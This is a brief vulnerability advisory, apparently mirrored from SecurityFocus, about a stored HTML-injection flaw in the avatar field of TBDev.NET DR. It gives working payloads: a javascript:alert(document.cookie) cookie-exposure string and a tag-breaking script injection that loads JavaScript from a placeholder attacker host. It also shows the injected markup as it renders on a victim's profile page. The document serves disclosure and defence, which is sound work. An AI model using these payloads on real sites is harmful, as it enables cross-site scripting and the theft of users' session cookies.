32 lines
No EOL
1.1 KiB
Text
32 lines
No EOL
1.1 KiB
Text
source: https://www.securityfocus.com/bid/24923/info
|
|
|
|
TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.
|
|
|
|
Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.
|
|
|
|
TBDev.NET DR 010306 and prior versions are vulnerable.
|
|
|
|
version 11-10-05-BETA-SF1:111005 <=
|
|
|
|
$avatar = $_POST["avatar"];
|
|
|
|
where
|
|
|
|
$_POST["avatar"]=javascript:alert(document.cookie);
|
|
or
|
|
$_POST["avatar"]="><script
|
|
src=http://urlmaliciousJavaScript></script><";
|
|
|
|
-> last version <= 010306
|
|
$_POST["avatar"]=javascript:alert(document.cookie);
|
|
|
|
go to
|
|
http://torrentvictim/userdetails.php?id=malicioususerprofileid
|
|
the souce code is:
|
|
...<tr><td class=rowhead>Avatar</td><td align=left><img src="\"><script
|
|
src=http://urlmaliciousJavaScript><script><\""></td></tr>...
|
|
|
|
or
|
|
|
|
...<tr><td class=rowhead>Avatar</td><td align=left><img
|
|
src="javascript:alert(document.cookie);"></td></tr>... |